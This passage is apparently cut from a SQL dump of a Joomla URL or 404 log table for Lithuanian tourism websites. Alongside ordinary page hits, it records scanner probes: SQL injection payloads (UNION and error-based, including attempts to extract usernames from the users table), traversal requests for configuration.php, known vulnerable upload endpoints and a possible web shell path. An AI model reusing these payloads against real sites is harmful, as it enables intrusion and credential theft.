00:00:00'),(1465,'http://www.tytuvenai.eu//index.php?option=com_myblog&task=ajaxupload','','','',4,0,'2015-08-14 11:51:02','0000-00-00 00:00:00'),(1466,'http://www.tytuvenai.eu/index.php/44-paskutinesnaujienos/123-pradedame-prekiauti-suvenyrais-su-tytuvn-simbolika/index.php?option=com_user&view=register','','','',2,0,'2015-08-25 10:51:30','0000-00-00 00:00:00'),(1467,'http://tytuvenai.eu/index.php?option=com_spidercontacts&contact_id=1 UNION SELECT 1,concat(0x776F6F79756E),3,4,5,6,7,8,9,10,11,12--&view=showcontact&lang=ca','','','',1,0,'2015-08-25 18:59:58','0000-00-00 00:00:00'),(1468,'http://tytuvenai.eu/index.php?option=com_simplephotogallery&view=images&photoid=&Itemid=&albumid=-0 UNION ALL SELECT NULL,NULL,CONCAT(0x776F6F79756E),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--','','','',1,0,'2015-08-25 19:00:24','0000-00-00 00:00:00'),(1469,'http://tytuvenai.eu/index.php?option=com_hdflvplayer&id=-0 UNION ALL SELECT CONCAT(0x776F6F79756E),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--','','','',1,0,'2015-08-25 19:00:24','0000-00-00 00:00:00'),(1470,'http://www.tytuvenai.eu/index.php?option=com_hdflvplayer&id=-0 UNION ALL SELECT CONCAT(0x776F6F79756E),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--','','','',1,0,'2015-08-25 23:43:52','0000-00-00 00:00:00'),(1471,'http://www.tytuvenai.eu/index.php?option=com_spidercontacts&contact_id=1 UNION SELECT 1,concat(0x776F6F79756E),3,4,5,6,7,8,9,10,11,12--&view=showcontact&lang=ca','','','',1,0,'2015-08-25 23:43:52','0000-00-00 00:00:00'),(1472,'http://www.tytuvenai.eu/index.php?option=com_simplephotogallery&view=images&photoid=&Itemid=&albumid=-0 UNION ALL SELECT NULL,NULL,CONCAT(0x776F6F79756E),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--','','','',1,0,'2015-08-26 10:24:56','0000-00-00 00:00:00'),(1473,'http://infotytuvenai.lt/index.php/admin/Cms_Wysiwyg/directive/index/','','','',1,0,'2015-09-15 03:59:42','0000-00-00 00:00:00'),(1474,'http://infotytuvenai.lt/index.php?option=com_simpleimageupload&view=upload&tmpl=component','','','',1,0,'2015-10-17 18:37:26','0000-00-00 00:00:00'),(1475,'http://www.infotytuvenai.lt/index.php/fancybox/fancy_shadow_n.png','','','',1,0,'2015-10-20 09:26:06','0000-00-00 00:00:00'),(1476,'http://www.infotytuvenai.lt/index.php/fancybox/fancy_shadow_ne.png','','','',1,0,'2015-10-20 09:26:07','0000-00-00 00:00:00'),(1477,'http://www.infotytuvenai.lt/index.php/fancybox/fancy_shadow_e.png','','','',1,0,'2015-10-20 09:26:07','0000-00-00 00:00:00'),(1478,'http://www.infotytuvenai.lt/index.php/fancybox/fancy_shadow_se.png','','','',1,0,'2015-10-20 09:26:07','0000-00-00 00:00:00'),(1479,'http://www.infotytuvenai.lt/index.php/fancybox/fancy_shadow_s.png','','','',1,0,'2015-10-20 09:26:08','0000-00-00 00:00:00'),(1480,'http://www.infotytuvenai.lt/index.php/fancybox/fancy_shadow_sw.png','','','',1,0,'2015-10-20 09:26:08','0000-00-00 00:00:00'),(1481,'http://www.infotytuvenai.lt/index.php/fancybox/fancy_shadow_w.png','','','',1,0,'2015-10-20 09:26:08','0000-00-00 00:00:00'),(1482,'http://www.infotytuvenai.lt/index.php/fancybox/fancy_shadow_nw.png','','','',1,0,'2015-10-20 09:26:09','0000-00-00 00:00:00'),(1483,'http://infotytuvenai.lt/index.php?option=com_user&view=register','','http://infotytuvenai.lt/index.php/component/users/?view=registration','',17,0,'2015-10-26 06:30:46','0000-00-00 00:00:00'),(1484,'http://infotytuvenai.lt/index.php/component/user/?task=register','','http://infotytuvenai.lt/index.php?option=com_user&view=register','',9,0,'2015-10-26 06:30:46','0000-00-00 00:00:00'),(1485,'http://infotytuvenai.lt/index.php/administrator','','','',3,0,'2015-10-30 09:22:40','0000-00-00 00:00:00'),(1486,'http://infotytuvenai.lt/index.php/admin','','','',2,0,'2015-10-30 09:22:40','0000-00-00 00:00:00'),(1487,'http://www.infotytuvenai.lt/index.php?option=com_easyblog&view=dashboard&layout=write','','http://www.infotytuvenai.lt/','',4,0,'2015-10-30 11:45:38','0000-00-00 00:00:00'),(1488,'http://infotytuvenai.lt/index.php?option=com_user&task=register','','http://infotytuvenai.lt/index.php?option=com_user&task=register','',1,0,'2015-11-25 08:06:23','0000-00-00 00:00:00'),(1489,'http://www.infotytuvenai.lt//index.php/turizmo-informacija','','','',4,0,'2015-12-10 02:52:41','0000-00-00 00:00:00'),(1490,'http://www.infotytuvenai.lt//index.php/apgyvendinimas','','','',4,0,'2015-12-10 02:52:42','0000-00-00 00:00:00'),(1491,'http://www.infotytuvenai.lt//index.php/apie-centra','','','',4,0,'2015-12-10 02:52:42','0000-00-00 00:00:00'),(1492,'http://www.infotytuvenai.lt//index.php/apie-centra/paslaugos','','','',4,0,'2015-12-10 02:52:42','0000-00-00 00:00:00'),(1493,'http://www.infotytuvenai.lt//index.php/apie-centra/ekskursijos','','','',4,0,'2015-12-10 02:52:43','0000-00-00 00:00:00'),(1494,'http://www.infotytuvenai.lt//index.php/apie-centra/edukacines-programos','','','',4,0,'2015-12-10 02:52:43','0000-00-00 00:00:00'),(1495,'http://www.infotytuvenai.lt//index.php/apie-centra/suvenyrai','','','',4,0,'2015-12-10 02:52:44','0000-00-00 00:00:00'),(1496,'http://www.infotytuvenai.lt//index.php/apie-centra/istatai','','','',4,0,'2015-12-10 02:52:44','0000-00-00 00:00:00'),(1497,'http://www.infotytuvenai.lt//index.php/apie-centra/darbo-uzmokestis','','','',4,0,'2015-12-10 02:52:44','0000-00-00 00:00:00'),(1498,'http://www.infotytuvenai.lt//index.php/apie-centra/veiklos-strategija','','','',4,0,'2015-12-10 02:52:45','0000-00-00 00:00:00'),(1499,'http://www.infotytuvenai.lt//index.php/apie-centra/viesieji-pirkimai','','','',4,0,'2015-12-10 02:52:45','0000-00-00 00:00:00'),(1500,'http://www.infotytuvenai.lt//index.php/apie-centra/parama','','','',4,0,'2015-12-10 02:52:45','0000-00-00 00:00:00'),(1501,'http://www.infotytuvenai.lt//index.php/apie-centra/galerija','','','',4,0,'2015-12-10 02:52:46','0000-00-00 00:00:00'),(1502,'http://www.infotytuvenai.lt//index.php/apie-centra/veiklos-ataskaitos','','','',4,0,'2015-12-10 02:52:46','0000-00-00 00:00:00'),(1503,'http://www.infotytuvenai.lt//index.php/pasiulymai','','','',4,0,'2015-12-10 02:52:46','0000-00-00 00:00:00'),(1504,'http://www.infotytuvenai.lt//index.php/turizmo-informacija/aktyvus-poilsis','','','',4,0,'2015-12-10 02:52:47','0000-00-00 00:00:00'),(1505,'http://www.infotytuvenai.lt//index.php/turizmo-informacija/kulinarinis-paveldas','','','',4,0,'2015-12-10 02:52:47','0000-00-00 00:00:00'),(1506,'http://www.infotytuvenai.lt//index.php/turizmo-informacija/gido-paslaugos','','','',4,0,'2015-12-10 02:52:47','0000-00-00 00:00:00'),(1507,'http://www.infotytuvenai.lt//index.php/turizmo-informacija/suvenyrai','','','',4,0,'2015-12-10 02:52:48','0000-00-00 00:00:00'),(1508,'http://www.infotytuvenai.lt//index.php/turizmo-informacija/turizmo-marsrutai','','','',4,0,'2015-12-10 02:52:48','0000-00-00 00:00:00'),(1509,'http://www.infotytuvenai.lt//index.php/turizmo-informacija/tytuvenu-regioninis-parkas','','','',4,0,'2015-12-10 02:52:48','0000-00-00 00:00:00'),(1510,'http://www.infotytuvenai.lt//index.php/turizmo-informacija/dubysos-regioninis-parkas','','','',4,0,'2015-12-10 02:52:49','0000-00-00 00:00:00'),(1511,'http://www.infotytuvenai.lt//index.php/turizmo-informacija/kurtuvenu-regioninis-parkas','','','',4,0,'2015-12-10 02:52:49','0000-00-00 00:00:00'),(1512,'http://www.infotytuvenai.lt//index.php/turizmo-informacija/varniu-regioninis-parkas','','','',4,0,'2015-12-10 02:52:49','0000-00-00 00:00:00'),(1513,'http://www.infotytuvenai.lt//index.php/maitinimas','','','',4,0,'2015-12-10 02:52:50','0000-00-00 00:00:00'),(1514,'http://www.infotytuvenai.lt//index.php/apgyvendinimas/apgyvendinimas','','','',4,0,'2015-12-10 02:52:50','0000-00-00 00:00:00'),(1515,'http://www.infotytuvenai.lt//index.php/apgyvendinimas/kaimo-turizmas','','','',4,0,'2015-12-10 02:52:50','0000-00-00 00:00:00'),(1516,'http://www.infotytuvenai.lt//index.php/lankytini-objektai/kulturos-paveldo-objektai','','','',4,0,'2015-12-10 02:52:51','0000-00-00 00:00:00'),(1517,'http://www.infotytuvenai.lt//index.php/lankytini-objektai/muziejai','','','',4,0,'2015-12-10 02:52:51','0000-00-00 00:00:00'),(1518,'http://www.infotytuvenai.lt//index.php/projektai','','','',4,0,'2015-12-10 02:52:51','0000-00-00 00:00:00'),(1519,'http://www.infotytuvenai.lt//index.php/projektai/i-etapas-baznycios-restauravimas','','','',4,0,'2015-12-10 02:52:52','0000-00-00 00:00:00'),(1520,'http://www.infotytuvenai.lt//index.php/projektai/ii-etapas-baznycios-restauravimas','','','',4,0,'2015-12-10 02:52:52','0000-00-00 00:00:00'),(1521,'http://www.infotytuvenai.lt//index.php/kontaktai','','','',4,0,'2015-12-10 02:52:52','0000-00-00 00:00:00'),(1522,'http://www.infotytuvenai.lt//index.php/tytuvenu-festivalis/naujienos','','','',4,0,'2015-12-10 02:52:53','0000-00-00 00:00:00'),(1523,'http://www.infotytuvenai.lt//index.php/tytuvenu-festivalis/programos','','','',4,0,'2015-12-10 02:52:53','0000-00-00 00:00:00'),(1524,'http://www.infotytuvenai.lt//index.php/tytuvenu-festivalis/galerija','','','',4,0,'2015-12-10 02:52:53','0000-00-00 00:00:00'),(1525,'http://www.infotytuvenai.lt//index.php/tytuvenu-festivalis/kontaktai','','','',4,0,'2015-12-10 02:52:54','0000-00-00 00:00:00'),(1526,'http://infotytuvenai.lt/index.php?option=com_user&view=reset&layout=confirm','','','',1,0,'2016-01-07 12:51:22','0000-00-00 00:00:00'),(1527,'http://infotytuvenai.lt//index.php/turizmo-informacija','','http://infotytuvenai.lt//','',1,0,'2016-01-21 08:14:43','0000-00-00 00:00:00'),(1528,'http://infotytuvenai.lt//index.php/apgyvendinimas','','http://infotytuvenai.lt//index.php/turizmo-informacija','',1,0,'2016-01-21 08:14:43','0000-00-00 00:00:00'),(1529,'http://infotytuvenai.lt//index.php/apie-centra','','http://infotytuvenai.lt/','',1,0,'2016-01-21 08:15:35','0000-00-00 00:00:00'),(1530,'http://infotytuvenai.lt//index.php/apie-centra/paslaugos','','http://infotytuvenai.lt//index.php/apie-centra','',1,0,'2016-01-21 08:15:35','0000-00-00 00:00:00'),(1531,'http://infotytuvenai.lt//index.php/apie-centra/ekskursijos','','http://infotytuvenai.lt//index.php/apie-centra/paslaugos','',1,0,'2016-01-21 08:15:36','0000-00-00 00:00:00'),(1532,'http://infotytuvenai.lt//index.php/apie-centra/edukacines-programos','','http://infotytuvenai.lt//index.php/apie-centra/ekskursijos','',1,0,'2016-01-21 08:15:36','0000-00-00 00:00:00'),(1533,'http://infotytuvenai.lt//index.php/apie-centra/suvenyrai','','http://infotytuvenai.lt//index.php/apie-centra/edukacines-programos','',1,0,'2016-01-21 08:15:37','0000-00-00 00:00:00'),(1534,'http://infotytuvenai.lt//index.php/apie-centra/istatai','','http://infotytuvenai.lt//index.php/apie-centra/suvenyrai','',1,0,'2016-01-21 08:15:37','0000-00-00 00:00:00'),(1535,'http://infotytuvenai.lt//index.php/apie-centra/darbo-uzmokestis','','http://infotytuvenai.lt//index.php/apie-centra/istatai','',1,0,'2016-01-21 08:15:38','0000-00-00 00:00:00'),(1536,'http://infotytuvenai.lt//index.php/apie-centra/veiklos-strategija','','http://infotytuvenai.lt//index.php/apie-centra/darbo-uzmokestis','',1,0,'2016-01-21 08:15:38','0000-00-00 00:00:00'),(1537,'http://infotytuvenai.lt//index.php/apie-centra/viesieji-pirkimai','','http://infotytuvenai.lt//index.php/apie-centra/veiklos-strategija','',1,0,'2016-01-21 08:15:39','0000-00-00 00:00:00'),(1538,'http://infotytuvenai.lt//index.php/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2015-m','','http://infotytuvenai.lt//index.php/apie-centra/viesieji-pirkimai','',1,0,'2016-01-21 08:15:39','0000-00-00 00:00:00'),(1539,'http://infotytuvenai.lt//index.php/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2014-m','','http://infotytuvenai.lt//index.php/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2015-m','',1,0,'2016-01-21 08:15:40','0000-00-00 00:00:00'),(1540,'http://infotytuvenai.lt//index.php/apie-centra/parama','','http://infotytuvenai.lt//index.php/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2014-m','',1,0,'2016-01-21 08:15:40','0000-00-00 00:00:00'),(1541,'http://infotytuvenai.lt//index.php/apie-centra/galerija','','http://infotytuvenai.lt//index.php/apie-centra/parama','',1,0,'2016-01-21 08:15:41','0000-00-00 00:00:00'),(1542,'http://infotytuvenai.lt//index.php/apie-centra/veiklos-ataskaitos','','http://infotytuvenai.lt//index.php/apie-centra/galerija','',1,0,'2016-01-21 08:15:41','0000-00-00 00:00:00'),(1543,'http://infotytuvenai.lt//index.php/pasiulymai','','http://infotytuvenai.lt//index.php/apie-centra/veiklos-ataskaitos','',1,0,'2016-01-21 08:15:42','0000-00-00 00:00:00'),(1544,'http://infotytuvenai.lt//index.php/turizmo-informacija/aktyvus-poilsis','','http://infotytuvenai.lt//index.php/pasiulymai','',1,0,'2016-01-21 08:15:43','0000-00-00 00:00:00'),(1545,'http://infotytuvenai.lt//index.php/turizmo-informacija/kulinarinis-paveldas','','http://infotytuvenai.lt//index.php/turizmo-informacija/aktyvus-poilsis','',1,0,'2016-01-21 08:15:43','0000-00-00 00:00:00'),(1546,'http://infotytuvenai.lt//index.php/turizmo-informacija/gido-paslaugos','','http://infotytuvenai.lt//index.php/turizmo-informacija/kulinarinis-paveldas','',1,0,'2016-01-21 08:15:43','0000-00-00 00:00:00'),(1547,'http://infotytuvenai.lt//index.php/turizmo-informacija/suvenyrai','','http://infotytuvenai.lt//index.php/turizmo-informacija/gido-paslaugos','',1,0,'2016-01-21 08:15:44','0000-00-00 00:00:00'),(1548,'http://infotytuvenai.lt//index.php/turizmo-informacija/turizmo-marsrutai','','http://infotytuvenai.lt//index.php/turizmo-informacija/suvenyrai','',1,0,'2016-01-21 08:15:45','0000-00-00 00:00:00'),(1549,'http://infotytuvenai.lt//index.php/turizmo-informacija/tytuvenu-regioninis-parkas','','http://infotytuvenai.lt//index.php/turizmo-informacija/turizmo-marsrutai','',1,0,'2016-01-21 08:15:46','0000-00-00 00:00:00'),(1550,'http://infotytuvenai.lt//index.php/turizmo-informacija/dubysos-regioninis-parkas','','http://infotytuvenai.lt//index.php/turizmo-informacija/tytuvenu-regioninis-parkas','',1,0,'2016-01-21 08:15:46','0000-00-00 00:00:00'),(1551,'http://infotytuvenai.lt//index.php/turizmo-informacija/kurtuvenu-regioninis-parkas','','http://infotytuvenai.lt//index.php/turizmo-informacija/dubysos-regioninis-parkas','',1,0,'2016-01-21 08:15:47','0000-00-00 00:00:00'),(1552,'http://infotytuvenai.lt//index.php/turizmo-informacija/varniu-regioninis-parkas','','http://infotytuvenai.lt//index.php/turizmo-informacija/kurtuvenu-regioninis-parkas','',1,0,'2016-01-21 08:15:47','0000-00-00 00:00:00'),(1553,'http://infotytuvenai.lt//index.php/maitinimas','','http://infotytuvenai.lt//index.php/turizmo-informacija/varniu-regioninis-parkas','',1,0,'2016-01-21 08:15:48','0000-00-00 00:00:00'),(1554,'http://infotytuvenai.lt//index.php/apgyvendinimas/apgyvendinimas','','http://infotytuvenai.lt//index.php/maitinimas','',1,0,'2016-01-21 08:15:48','0000-00-00 00:00:00'),(1555,'http://infotytuvenai.lt/index.php/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2016-m','','http://infotytuvenai.lt/index.php/apie-centra/viesieji-pirkimai','',4,0,'2016-02-09 06:35:42','0000-00-00 00:00:00'),(1556,'http://www.infotytuvenai.lt/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',88,0,'2016-02-23 13:12:30','0000-00-00 00:00:00'),(1557,'http://www.infotytuvenai.lt/index.php?option=com_myblog&task=ajaxupload','','','',8,0,'2016-02-23 13:12:42','0000-00-00 00:00:00'),(1558,'http://www.infotytuvenai.lt/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',19,0,'2016-02-23 13:12:44','0000-00-00 00:00:00'),(1559,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','','',1,0,'2016-02-23 13:12:47','0000-00-00 00:00:00'),(1560,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',2,0,'2016-02-23 13:12:49','0000-00-00 00:00:00'),(1561,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b','','','',2,0,'2016-02-23 13:12:49','0000-00-00 00:00:00'),(1562,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2016-02-23 13:12:51','0000-00-00 00:00:00'),(1563,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',1,0,'2016-02-23 13:12:53','0000-00-00 00:00:00'),(1564,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-02-23 13:12:55','0000-00-00 00:00:00'),(1565,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-02-23 13:12:57','0000-00-00 00:00:00'),(1566,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-02-23 13:12:59','0000-00-00 00:00:00'),(1567,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-02-23 13:13:01','0000-00-00 00:00:00'),(1568,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',1,0,'2016-02-23 13:13:03','0000-00-00 00:00:00'),(1569,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',1,0,'2016-02-23 13:13:05','0000-00-00 00:00:00'),(1570,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',1,0,'2016-02-23 13:13:07','0000-00-00 00:00:00'),(1571,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',1,0,'2016-02-23 13:13:09','0000-00-00 00:00:00'),(1572,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2016-02-23 13:13:11','0000-00-00 00:00:00'),(1573,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/components/com_sexycontactform/fileupload/index.php','','','',1,0,'2016-02-23 13:13:15','0000-00-00 00:00:00'),(1574,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2016-02-23 13:13:17','0000-00-00 00:00:00'),(1575,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',1,0,'2016-02-23 13:13:19','0000-00-00 00:00:00'),(1576,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/index.php?option=com_myblog&task=ajaxupload','','','',1,0,'2016-02-23 13:13:23','0000-00-00 00:00:00'),(1577,'http://www.infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2016-02-23 13:13:25','0000-00-00 00:00:00'),(1578,'http://infotytuvenai.lt/index.php?option=com_easyblog&view=dashboard&layout=write','','http://infotytuvenai.lt/','',1,0,'2016-02-26 18:59:47','0000-00-00 00:00:00'),(1579,'http://www.infotytuvenai.lt/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select 0x6275677363616E776B),floor(rand(0)*2))x from information_schema.tables group by x','','','',1,0,'2016-03-24 18:54:19','0000-00-00 00:00:00'),(1580,'http://www.infotytuvenai.lt/index.php?option=com_jetext&task=download&file=[../../index.php]','','','',3,0,'2016-03-24 18:54:20','0000-00-00 00:00:00'),(1581,'http://www.infotytuvenai.lt/index.php?option=com_cckjseblod&task=download&file=configuration.php','','','',3,0,'2016-03-24 18:54:20','0000-00-00 00:00:00'),(1582,'http://www.infotytuvenai.lt/index.php/weblinks-categories?id=0 ) union select md5(3.1415)-- )','','','',3,0,'2016-03-24 18:54:20','0000-00-00 00:00:00'),(1583,'http://www.infotytuvenai.lt/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null\'+/*!50000UnIoN*/+/*!50000SeLeCt*/md5(3.1415),222-- -','','','',3,0,'2016-03-24 18:54:21','0000-00-00 00:00:00'),(1584,'http://www.infotytuvenai.lt/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+md5(3.1415)--','','','',3,0,'2016-03-24 18:54:21','0000-00-00 00:00:00'),(1585,'http://www.infotytuvenai.lt/index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=com_enmasse&sortBy=117 and(select 1 from(select count(*),concat((select (select (select mid(md5(3.1415),1,16)) ) from `information_schema`.tables limit 0,1),f','','','',1,0,'2016-03-24 18:54:21','0000-00-00 00:00:00'),(1586,'http://www.infotytuvenai.lt/index.php?option=com_vnmshop&catid=113 LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5(3.1415),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL','','','',1,0,'2016-03-24 18:54:21','0000-00-00 00:00:00'),(1587,'http://www.infotytuvenai.lt/index.php?option=com_job&controller=listcategory&task=viewJob&id_job=-1+UNION+ALL+SELECT+1,md5(3.1415),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42--','','','',3,0,'2016-03-24 18:54:22','0000-00-00 00:00:00'),(1588,'http://www.infotytuvenai.lt/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24\" and 1=0 union select 1,2,3,4,5,6,7,8,md5(3.1415),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41','','','',1,0,'2016-03-24 18:54:22','0000-00-00 00:00:00'),(1589,'http://www.infotytuvenai.lt/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222,MD5(3.1415),444,555,666,777,888,999--+AbuHassan','','','',3,0,'2016-03-24 18:54:22','0000-00-00 00:00:00'),(1590,'http://www.infotytuvenai.lt/index.php?option=com_ebcontent&view=article&tmpl=component&id=MD5(3.1415)&cid=9&print=','','','',3,0,'2016-03-24 18:54:22','0000-00-00 00:00:00'),(1595,'http://www.infotytuvenai.lt//index.php/apie-centra/viesieji-pirkimai/mazos-vertes-uz-2016-m','','','',3,0,'2016-03-27 11:27:27','0000-00-00 00:00:00'),(1596,'http://www.infotytuvenai.lt//index.php/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2015-m','','','',3,0,'2016-03-27 11:27:27','0000-00-00 00:00:00'),(1597,'http://www.infotytuvenai.lt//index.php/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2014-m','','','',3,0,'2016-03-27 11:27:28','0000-00-00 00:00:00'),(1602,'http://www.infotytuvenai.lt//index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select 0x5f5f52525f5f),floor(rand(0)*2))x from information_schema.tables group by x)a)','','','',1,0,'2016-04-18 22:10:19','0000-00-00 00:00:00'),(1603,'http://infotytuvenai.lt/index.php?option=com_myblog&task=ajaxupload','','','',128,0,'2016-04-21 09:19:59','0000-00-00 00:00:00'),(1604,'http://infotytuvenai.lt/index.php/turizmo-informacija//images/xxu.php','','','',1,0,'2016-04-21 09:33:35','0000-00-00 00:00:00'),(1605,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/aktyvus-poilsis+Kelme+Fresh+OR+Email+OR+addresses+OR+2016+\"@gmail.com\"+-None+-fraud+-scam','','','',1,0,'2016-04-30 15:46:04','0000-00-00 00:00:00'),(1606,'http://www.infotytuvenai.lt/index.php/turizmo-informacija/aktyvus-poilsis+Tytuvenai+Fresh+OR+Email+OR+addresses+OR+2016+\"@gmail.com\"+-None+-fraud+-scam','','','',1,0,'2016-05-02 13:05:33','0000-00-00 00:00:00'),(1607,'http://infotytuvenai.lt/index.php/forum/topic/create','','http://infotytuvenai.lt/','',2,0,'2016-05-23 22:20:53','0000-00-00 00:00:00'),(1608,'http://infotytuvenai.lt/index.php?option=com_garyscookbook&func=newItem','','http://infotytuvenai.lt/index.php?option=com_garyscookbook&func=newItem','',1,0,'2016-05-30 11:51:42','0000-00-00 00:00:00'),(1609,'http://infotytuvenai.lt//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',1,0,'2016-06-06 16:53:28','0000-00-00 00:00:00'),(1610,'http://www.infotytuvenai.lt/index.php/ 34','','','',1,0,'2016-06-09 09:36:01','0000-00-00 00:00:00'),(1611,'http://infotytuvenai.lt/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(username)) from #__users limit 0,1),floor(rand(0)*2))x from information','','','',1,0,'2016-06-18 01:11:15','0000-00-00 00:00:00'),(1612,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/19-sample-data-article/demo/courses','','','',17,0,'2016-06-23 00:56:00','0000-00-00 00:00:00'),(1613,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/15-sample-data-article/demo/portfolio/2010','','','',16,0,'2016-06-23 00:56:18','0000-00-00 00:00:00'),(1614,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/47-piligrimai/piligrimai','','','',40,0,'2016-06-23 00:56:28','0000-00-00 00:00:00'),(1615,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/10-sample-data-article/demo','','','',18,0,'2016-06-23 00:57:33','0000-00-00 00:00:00'),(1616,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/13-sample-data-article/demo/features','','','',16,0,'2016-06-23 00:57:43','0000-00-00 00:00:00'),(1617,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/41-apie-centra/projektai','','','',37,0,'2016-06-23 00:57:52','0000-00-00 00:00:00'),(1618,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/8-sample-data-article/joomla','','','',21,0,'2016-06-23 00:58:20','0000-00-00 00:00:00'),(1619,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/17-sample-data-article/demo/portfolio/2012','','','',16,0,'2016-06-23 00:58:30','0000-00-00 00:00:00'),(1620,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/56-tytuvenu-festivalis/naujienos','','','',34,0,'2016-06-23 00:58:39','0000-00-00 00:00:00'),(1621,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/11-sample-data-article/demo/short-code','','','',16,0,'2016-06-23 00:58:48','0000-00-00 00:00:00'),(1622,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/14-sample-data-article/demo/portfolio','','','',16,0,'2016-06-23 00:58:58','0000-00-00 00:00:00'),(1623,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/16-sample-data-article/demo/portfolio/2011','','','',16,0,'2016-06-23 00:59:17','0000-00-00 00:00:00'),(1624,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/46-tytuvenai/apie-tytuvenus','','','',35,0,'2016-06-23 00:59:36','0000-00-00 